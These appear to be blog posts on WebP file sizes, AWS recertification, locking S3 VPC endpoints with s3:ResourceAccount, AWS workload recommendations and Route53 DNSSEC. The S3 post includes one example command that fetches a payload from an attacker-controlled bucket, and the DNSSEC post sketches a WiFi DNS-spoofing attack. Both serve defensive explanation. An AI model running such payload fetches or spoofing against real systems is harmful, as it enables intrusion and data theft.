Image formats: WebP wins!

I recently imported a PDF image into the open source GNU Image Manipulation Program, also called The GIMP, edited it, and wanted to save the output to a format that I can use natively online.

The rendered image is 1458 by 1126.

Historically I would have chosen JPEG if it was a picture with lots of different colours, or PNG if it had specific colours or an alpha channel (transparency). In this case, I saved it as both of the above, plus the new kid on the block, WebP.

I chose a 60% quality setting for both the JPEG and WebP formats, and while I can’t tell the difference visually, I can on disk.

Format | Bits | DPI | File size
--- | --- | --- | ---
PDF | | | 5,211,365
JPG | 32 | 100 | 76,178
PNG | 24 | | 412,813
WebP | 32 | 72 | 32,768
File formats compared

The clear winner here is WebP on file size. It’s some 57% smaller than the JPEG, and 92% smaller than the PNG.
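The percentages can be checked with a few lines of Python. This is only a sketch of the arithmetic, using the file sizes from the comparison table; the function name percent_smaller is my own.

```python
# File sizes taken from the comparison table above.
sizes = {"JPG": 76_178, "PNG": 412_813, "WebP": 32_768}


def percent_smaller(candidate: int, baseline: int) -> float:
    """Return how much smaller `candidate` is than `baseline`, as a percentage."""
    return (1 - candidate / baseline) * 100


# Compare WebP against each of the other raster formats.
savings = {
    name: percent_smaller(sizes["WebP"], size)
    for name, size in sizes.items()
    if name != "WebP"
}

for name, saving in savings.items():
    print(f"WebP is {saving:.1f}% smaller than {name}")
```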

WebP was originally proposed in 2010, but it took a long time for libraries to be written, and then incorporated into browsers and operating systems.

Today, Chrome, Edge, Firefox, Safari, Brave and more support it. As I write this, the CanIUse.com site rates WebP at having 92.13% support.

Not all services you use support uploading WebP images at this stage, but that’s up to the developer community to understand, implement and support. The time for this is looking like now!

AWS Re-certification

Time passes, and before you know it, three years have raced past and you get the following email:

Hello James Bromberger,

Your AWS Certified Solutions Architect – Associate is set to expire on Mar 13, 2021.

How to Recertify

To maintain your certification, you must pass the current version of the AWS Certified Solutions Architect – Associate exam. Check out our Recertification Policy for more information and details by certification level.

You have a 50% discount voucher in your AWS Certification Account under the “Benefits” section. If you haven’t done so already, you can apply this voucher to your exam fee to recertify or apply it to any future certification exam you wish to pursue by Mar 13, 2021. Sign in to aws.training/certification to get started.

If you have any questions, please refer to our FAQs or contact us.

Thank you,

AWS Training and Certification

My Solutions Architect Professional certification also renews the corresponding subordinate Solutions Architect Associate certification, which I first obtained on the 24th of February 2013 as one of the first in the world to sit this.

This reminder email came out exactly one month before expiry, so I have plenty of time to study and prepare.

With the global pandemic effectively shutting down much of the world, next week also marks 12 months since I was on a plane – the purpose of which was to attend an exam certification workshop to write the items (questions) for the… Solutions Architect Professional certification, as a Subject Matter Expert. Of course, there are many questions in the certification pool, and each candidate gets a random selection, including some questions that are non-scoring and are themselves being tested on candidates.

I often point my Modis AWS Cloud practice colleagues at the Certification process training course on the aws.training site. It gives you a great insight into the thoroughness of the process; it’s quite in depth. This should give confidence to candidates who strive to obtain these vendor certifications – they are discerning, and for good reason – to retain value.

Securing VPC S3 Endpoints: Blocking other buckets

What is the new s3:ResourceAccount policy condition for? Security!

AWS Virtual Private Cloud is a wonder of the modern cloud age. While most of the magic is encapsulation, it also has a deep permissions policy that is highly effective in large deployments.

From a security perspective, accessing your S3 private stores by egressing your VPC over the Internet seemed like a control needing to be improved, and this landed with S3 Endpoints (now Gateway Endpoints) in 2015. These Gateway Endpoints rely upon integration into the VPC Routing table, whereas the newer Interface Endpoints have network interfaces (ENIs) in designated VPCs. Oh, and Interface Endpoints are charged for (at this time), while the Gateway Endpoints are (again, at this time) complimentary.

Having an S3 Endpoint meant that your buckets, as a Resource, could now have a policy applied to them to limit their access to only traffic originating from the given Endpoint(s) or VPC(s). This helps limit the damage from stolen credentials, since they can no longer be used against the bucket from outside your network.
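As a rough sketch of what such a bucket policy can look like, here it is built as a Python dictionary. The bucket name and endpoint ID are made up for illustration, and the helper function is my own; aws:SourceVpce is the condition key that matches the endpoint a request arrived through. Be careful with a blanket Deny like this in real life, as it also locks out anything that does not come via the endpoint, including the console.

```python
import json


def bucket_policy_for_endpoint(bucket: str, vpce_id: str) -> dict:
    """Deny all S3 actions on the bucket unless the request arrives via the given endpoint."""
    return {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Sid": "DenyUnlessFromEndpoint",
                "Effect": "Deny",
                "Principal": "*",
                "Action": "s3:*",
                # Cover both the bucket itself and the objects inside it.
                "Resource": [
                    f"arn:aws:s3:::{bucket}",
                    f"arn:aws:s3:::{bucket}/*",
                ],
                "Condition": {"StringNotEquals": {"aws:SourceVpce": vpce_id}},
            }
        ],
    }


# Hypothetical bucket name and endpoint ID, for illustration only.
policy = bucket_policy_for_endpoint("mycompany-data", "vpce-0123456789abcdef0")
print(json.dumps(policy, indent=2))
```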

But another consideration existed, which endpoints also supported: a filter on the Endpoint itself, limiting the actions and buckets that resources within the VPC were allowed to access from the S3 service.

However, the policy language could only base a permit or deny rule on an S3 bucket name, and as we know, buckets can have any name so long as no one else already has that name. Indeed, there is a race here to create names for buckets that other people may want, and Bucket Squatting (on those names) is a thing.

S3 bucket names couldn’t be reserved or namespaced (outside of the existing ARN), and while a policy that denies access to any bucket not called “mycompany-*” could be deployed on the Endpoint, that doesn’t stop an attacker also calling their bucket “mycompany-notreally”.
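The weakness of a name-only filter is easy to show. The sketch below uses Python's fnmatch wildcard matching as a stand-in for the policy wildcard (an assumption for illustration, not how AWS evaluates policies internally), with example bucket names of my own.

```python
from fnmatch import fnmatchcase

ALLOWED_PATTERN = "mycompany-*"  # the name-based filter described in the text


def name_filter_allows(bucket_name: str) -> bool:
    """Return True if the bucket name passes the name-only filter."""
    return fnmatchcase(bucket_name, ALLOWED_PATTERN)


# The attacker's bucket passes just as easily as a genuine one.
for bucket in ("mycompany-logs", "mycompany-notreally", "othercorp-data"):
    print(bucket, name_filter_allows(bucket))
```

The filter knows nothing about who owns the bucket, which is exactly the gap an ownership-based condition needs to fill.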

Why Filter Access to S3

There are two major reasons why an attacker would want to get access from your resources to S3:

  1. Data ingestion to your network of malware, compilers, large scripts or other tools
  2. Data exfiltration to their own resource

Let’s consider an Instance that has been taken over. Some RAT or execution is happening on your compute at their behest. And perhaps the attacker is aware of some level of VPC S3 Endpoint policy that may be in place.

The ability to put in large complicated scripts, malware and payloads may be limited from the command and control channel, whereas a call to wget s3://mycompany-notreally/payload.bin may actually succeed in transferring that very large payload to your instance, which it then runs.

And of course it works in reverse: when they want to steal your data, they upload it to an S3 bucket under their control, from which they can later exfiltrate it out of S3 separately.

Policies for S3 ARNs

The initial thought is to use an ARN that would filter on something like arn:aws:s3:12345678901::mybucket-*, but alas, Account IDs are not valid in S3 ARNs! Today, AWS announced a new condition key that takes care of this, called s3:ResourceAccount. It achieves a similar thing.

Thus, in a CloudFormation template snippet, you can now put:

S3Endpoint:
  Type: 'AWS::EC2::VPCEndpoint'
  Properties:
    PolicyDocument:
      Version: "2012-10-17"
      Statement:
      - Action: s3:*
        Effect: Deny
        Resource: '*'
        Principal: '*'
        Condition:
          StringNotEquals:
            s3:ResourceAccount: !Ref 'AWS::AccountId'
    RouteTableIds:
      - !Ref RouteTablePublic
      - !Ref RouteTableNATGatewayA
      - !Ref RouteTableNATGatewayB
      - !Ref RouteTableNATGatewayC
      - !Ref RouteTablePrivate
    ServiceName: !Join
      - .
      - - com.amazonaws
        - !Ref 'AWS::Region'
        - s3
    VpcId: !Ref VPC
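To see what that Deny statement does, here is a toy model in Python. It only mimics the single StringNotEquals check on s3:ResourceAccount and is in no way AWS's real policy evaluation (which also needs the request to be allowed in the first place); the account IDs and function names are made up for illustration.

```python
def endpoint_policy(own_account_id: str) -> dict:
    """Build the same Deny statement as the template, as a plain dictionary."""
    return {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Deny",
                "Principal": "*",
                "Action": "s3:*",
                "Resource": "*",
                "Condition": {
                    "StringNotEquals": {"s3:ResourceAccount": own_account_id}
                },
            }
        ],
    }


def is_denied(policy: dict, bucket_owner_account: str) -> bool:
    """Toy check: does a Deny statement fire for a bucket owned by this account?"""
    for statement in policy["Statement"]:
        if statement["Effect"] != "Deny":
            continue
        expected = statement["Condition"]["StringNotEquals"]["s3:ResourceAccount"]
        if bucket_owner_account != expected:
            return True
    return False


policy = endpoint_policy("111111111111")  # hypothetical: our own account
print(is_denied(policy, "111111111111"))  # bucket in our own account
print(is_denied(policy, "999999999999"))  # bucket in somebody else's account
```

The bucket name never enters the decision, so calling a bucket “mycompany-notreally” gains the attacker nothing.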

Current AWS Workload recommendations December 2020

There’s a heap of Best Practice around workloads online and in AWS, and here are some of my current thoughts as at December 2020 – your mileage may vary, caveat emptor, no warranty expressed or implied, and you may have use-cases that justify something different:

Pattern | Recommendation | Rationale
--- | --- | ---
Multi-AZ VPC | Design Address space for 4 AZs | In an AZ outage, having just one AZ remaining to satisfy demand during a rush is not enough; using contiguous address space and CIDR masks means after 2, we have 4
VPC DNSSEC validation | Enable for VPC Validation, but be ready for external zones to stuff up their DNSSEC keys | Failing closed may be better than failing open; but new failure modes need to be understood.
Route53 Hosted Zone DNSSEC | Hold off until current issues are resolved if you use CloudFront | New service, new failure modes.
TLS | 1.2 and above only | Older versions are now already removed from many clients; be ready for TLS 1.3 and above only
VPC IPv6 | Enable for all subnets | 33% of traffic worldwide is now IPv6; your external interfaces (ALB/NLB) should all be dual stack now as a minimum. Don’t forget your AAAA Alias DNS records.
VPC External EGRESS for private subnets | Minimise, avoid if possible. | You shouldn’t have any boot time or runtime dependencies – apart from the outbound integrations you are explicitly creating. Use ENDPOINTS for S3 and other services. Minimise Internet transit.
CloudFront IPv6 | Enable for all distributions | As above; particularly if your origin is only on IPv4. Don’t forget your AAAA Alias DNS records.
HTTP interfaces | Only for the APEX of the domain if you think people will type your address by hand into a browser; for all other services, do not listen on port 80 HTTP | Avoid convenience redirects, they are a point of weakness. Use HTTPS for everything, including internal services.
ACM Public TLS Certificates | Use DNS validation, and leave validation in place for subsequent reissue | Remove the manual work in renewing and redeploying certificates.
S3 Block Public Access | Do this for every bucket, and if possible, Account-wide AS WELL. | Two levels of this in case you have to disable account-wide in future.
S3 Website public (anonymous) hosting | Do not use; look at CloudFront with Origin Access Identity | You can’t get a custom certificate nor control TLS on S3. But beware default document handling and other issues.
S3 Access Logging | Enable, but set a retention policy in the S3 Bucket | No logs means no evidence when investigating issues.
CloudFront Access Logging | Enable, but set a retention policy in the S3 Bucket | No logs means no evidence when investigating issues.
VPC Flow Logs | Enable for all, but set a retention policy in the CloudWatch Log | No logs means no evidence when investigating issues.
Database | Use RDS or Aurora wherever possible | Less operational overhead
RDS Maintenance: Minor versions | Always adopt latest minor version pro-actively, from Dev through to Prod | Don’t wait for the automatic upgrade to happen; that’s typically on decommission of the version being available.
RDS Maintenance: Major Versions | After testing, move up to latest Major version | Avoid being on a decommissioned major version; the enforced upgrade jump may be a bigger jump forward than your application can support.
RDS Encrypt in flight | Enforce | Ensure privacy of the credentials for connection regardless of where the client is. Don’t assume the client config to use encryption is correct
RDS Encryption in flight | Validate | Get the RDS CA certificate(s) in your trust path during application build time. Always automate bringing them in (and validate and log where you get these from).
RDS Encryption at rest | Enable | KMS is fine. Use a dedicated key for important workloads (and don’t share the key with other accounts).
DNS Records | Always publish a CAA and SPF record, even for parked domains | Reduce risk and protect reputation
HTTP Security Headers | Validate on SecurityHeaders, Hardenize, SSLLabs, Mozilla Observatory, and Google Lighthouse (and possibly more). | This is an entire lesson, but an A will stand you in good stead.
HTTP Security Headers: HSTS | Enforce HSTS for a year | We’re never going back to unencrypted HTTP
Public CDNs for libraries in major projects | Avoid; host your own assets. | Remove external dependencies
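On the first row, the “after 2, we have 4” point comes straight from how CIDR masks work: each extra mask bit doubles the number of equal blocks, so there is no tidy split into three. A small sketch with Python's standard ipaddress module, assuming a hypothetical 10.0.0.0/16 VPC range:

```python
import ipaddress

# Hypothetical VPC range, chosen only for illustration.
vpc = ipaddress.ip_network("10.0.0.0/16")

# One extra mask bit gives 2 equal blocks; two extra bits give 4.
az_blocks = list(vpc.subnets(prefixlen_diff=2))

for az, block in zip("abcd", az_blocks):
    print(f"AZ {az}: {block} ({block.num_addresses} addresses)")
```

Each of the four blocks can then be carved up further into public and private subnets for that AZ, even if you only deploy into two or three of them on day one.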

DNSSEC and Route53

DNS is one of the last insecure protocols in use. Since 1983 it has helped identify resources on the Internet, with a name space and a hierarchy based upon a common agreed root.

Your local device – your laptop, your phone, your smart TV, whatever you’re using to read this article – has typically been configured with a local DNS resolver. When your device needs to look up an address, it asks that resolver to go and find the answer.

The protocol used by your local device to the resolver, and from the resolver to reach out across the Internet, is an unencrypted protocol. It normally runs on UDP port 53, switching to TCP 53 under certain conditions.

There is no privacy across either your local network, or the wider Internet, of what records are being looked up or the responses coming back.
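To make the lack of privacy concrete, here is a minimal sketch that builds the bytes of a plain DNS query without sending anything. The function name and the query ID are my own choices; the layout follows the standard DNS message format (a 12 byte header, then the question).

```python
import struct


def build_dns_query(name: str, query_id: int = 0x1234) -> bytes:
    """Build a minimal DNS query (type A, class IN) as it would travel over UDP port 53."""
    # Header: ID, flags (0x0100 = recursion desired), 1 question, 0 other records.
    header = struct.pack("!HHHHHH", query_id, 0x0100, 1, 0, 0, 0)
    # Question name: each label is prefixed by its length, ending with a zero byte.
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii") for label in name.split(".")
    ) + b"\x00"
    # QTYPE 1 = A record, QCLASS 1 = Internet.
    return header + qname + struct.pack("!HH", 1, 1)


packet = build_dns_query("www.bank.com")
print(packet)
```

Printing the packet shows the labels www, bank and com sitting in clear text, readable by anyone who can see the traffic.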

There’s also no validation that the response sent back to the Resolver IS the correct answer. And malicious actors may try to spuriously send invalid responses to your upstream resolver. For example, I could get my laptop on the same WiFi as you, and send UDP packets to the configured resolver telling it that the response to “www.bank.com” is my address, in order to get you to then connect to a fake service I am running, and try and get some data from you (like your username and password). Hopefully your bank is using HTTPS, and the certificate warning you would likely get would be enough to stop you from entering information that I would get.

The solution to this was to use digital signatures (not encryption) to verify the DNS response received by the upstream resolver from across the Internet. And thus DNSSEC was born in 1997 (23 years ago as at 2020).

The take up has been slow.

Part of this has been the need for each component of a DNS name – each zone – to deploy a DNSSEC-capable DNS server to generate the signatures, and then for each domain to be signed.

The public DNS root was signed in 2010, along with some of the original Top Level Domains. Today the Wikipedia page for the Internet TLDs shows a large number of them are signed and ready for their customers to have their DNS domains return DNSSEC results.

Since 2012 US Government agencies have been required by NIST to deploy DNSSEC, but most years agencies opt out of this. It’s been too difficult, or the DNS software or service they are using to host their Domain does not support it.

Two parts to DNSSEC

On the one side, the operator of the zone being looked up (and their parent domain) all need to support DNSSEC and have established a chain of trust. If you turn on DNSSEC for your authoritative domain, then those clients who are not validating the responses won’t see any difference.

Separately, the client side DNS Resolver (often deployed by your ISP, Telco, or network provider) needs to understand and validate the DNSSEC Response. If they turn on DNSSEC for your Resolver, then there’s no impact for resolving domains that don’t support DNSSEC.

Both of these need to be in place to offer some form of protection against DNS spoofing, cache poisoning or other attacks.
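The two sides combine into a small truth table, sketched below. This is a deliberately simplified model with names of my own invention: a validating resolver that cannot verify a signed zone's answer fails the lookup (clients typically see SERVFAIL), while every other combination behaves like plain DNS.

```python
def dnssec_outcome(zone_signed: bool, resolver_validates: bool, signature_ok: bool = True) -> str:
    """Simplified model of what a client gets back for each combination."""
    if not (zone_signed and resolver_validates):
        # Either side missing: the answer is passed on as with plain DNS.
        return "answer accepted without verification"
    if signature_ok:
        return "answer verified"
    return "answer rejected"


for zone_signed in (False, True):
    for resolver_validates in (False, True):
        print(zone_signed, resolver_validates, dnssec_outcome(zone_signed, resolver_validates))
```

Only the last row, with both sides enabled, gives the protection, and it is also the only row where a broken signature takes the name off-line.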

Route 53 Support for DNSSEC

In December 2020, Route53 finally announced support for DNSSEC, after many years and many customer requests. And this support comes in two ways.

Firstly, there is now a tick box to enable the VPC-provided resolver to validate DNSSEC entries, if they are received. It’s either on, or off at this stage.

And separately, for hosted DNS Zones (your domains), you can now enable DNSSEC and have signed responses sent by Route53 for queries to your DNS entries, so they can be validated.

A significant caveat right now (Dec 2020) for hosted zones is that this doesn’t support the custom Route53 ALIAS record type, used for defining custom names for CloudFront Distributions.

DNSSEC Considerations: VPC Resolver

You probably should enable DNSSEC for your VPC resolvers, particularly if you want additional verification that you aren’t being spoofed. There appears to be no additional cost for this, so the only consideration is why not?

The largest risk comes from misconfiguration of the domain names that you are looking up.

In January 2018, the US Government had a shutdown due to blocked legislation. Staff walked off the job, and some of those agencies had DNSSEC deployed – and for at least one of them, its DNS keys expired, taking their entire domain off-line (many others let their web site TLS certificates expire, causing warnings in browsers, but email, for example, still worked for them).

So, you should weigh up the improvement in security posture, versus the risk of an interruption through misconfiguration.

In order to enable it, go to the Route53 Console, and navigate to Resolvers -> VPCs.

Choose the VPC Resolver, and scroll to the bottom of the page where you’ll see the below check box.

DNSSEC enabled for a VPC
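If you would rather script this than click through the console, the same setting is, to the best of my knowledge, exposed in boto3 on the route53resolver client as update_resolver_dnssec_config. Treat the sketch below as an assumption to check against the current boto3 documentation; the wrapper function and the VPC ID are hypothetical.

```python
def enable_vpc_dnssec_validation(resolver_client, vpc_id: str) -> dict:
    """Turn on DNSSEC validation for the resolver of one VPC.

    `resolver_client` is expected to be a boto3 "route53resolver" client.
    """
    return resolver_client.update_resolver_dnssec_config(
        ResourceId=vpc_id,
        Validation="ENABLE",
    )


# Usage, assuming boto3 is installed and credentials are configured:
#   import boto3
#   client = boto3.client("route53resolver")
#   enable_vpc_dnssec_validation(client, "vpc-0123456789abcdef0")  # hypothetical VPC ID
```

Passing the client in, rather than creating it inside the function, keeps the function easy to test with a stub before pointing it at a real account.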

DNSSEC Considerations: Your Hosted Zones

As a managed service, Route53 normally handles all maintenance and operational activities for you. Serving your records with DNSSEC at least gives your customers the opportunity to validate responses (as they enable their validation).

I’d suggest that this is a good thing. However, with the caveat around CloudFront ALIAS records right now, I am choosing not to rush to production hosted zones today, but staying on my non-production and non-mission critical zones.

DNSSEC enabled on a hosted zone

I have always said that your non-production environments should be a leading indicator of the security that will get to production (at some stage), so this approach aligns with this.

The long term impact of Route53 DNSSEC

Route53 is a strategic service that means customers do not need to allocate their own fixed address space and run their own DNS servers (many of which never receive enough security maintenance and updates). With DNSSEC support, the barriers to adoption are reduced, and indeed, I feel we’ll see an up-tick in DNSSEC deployment worldwide because of this capability coming to Route53.

Other Approaches

An alternate security mechanism being tested now is called DNS over HTTPS, or DoH. This hides the DNS names being requested from the local network provider by encrypting them (they still see the IP addresses being accessed).
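For the curious, here is a sketch of how a DoH request is put together under RFC 8484: the ordinary binary DNS query is base64url encoded, without padding, and carried in the dns parameter of an HTTPS GET. The resolver URL below is a placeholder rather than a real service, the function name is mine, and nothing is sent over the network.

```python
import base64
import struct


def doh_get_url(name: str, resolver_url: str = "https://dns.example/dns-query") -> str:
    """Wrap a DNS query for `name` (type A) in an RFC 8484 style GET URL."""
    # Same wire format as plain DNS: header with ID 0 and recursion desired.
    header = struct.pack("!HHHHHH", 0, 0x0100, 1, 0, 0, 0)
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii") for label in name.split(".")
    ) + b"\x00"
    message = header + qname + struct.pack("!HH", 1, 1)  # type A, class IN
    # base64url without the trailing "=" padding, as the RFC requires.
    encoded = base64.urlsafe_b64encode(message).rstrip(b"=").decode("ascii")
    return f"{resolver_url}?dns={encoded}"


print(doh_get_url("www.example.com"))
```

The name is still inside the request, but because the whole exchange rides inside HTTPS, only the DoH resolver gets to read it.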

In corporate settings, DoH is frowned upon, as many corporate IT departments want to inspect and protect staff by blocking certain content at the DNS level (eg, block all lookups for betting sites) – and hiding this in DoH may prevent this.

In the end, a resolver somewhere knows which client looked up what address.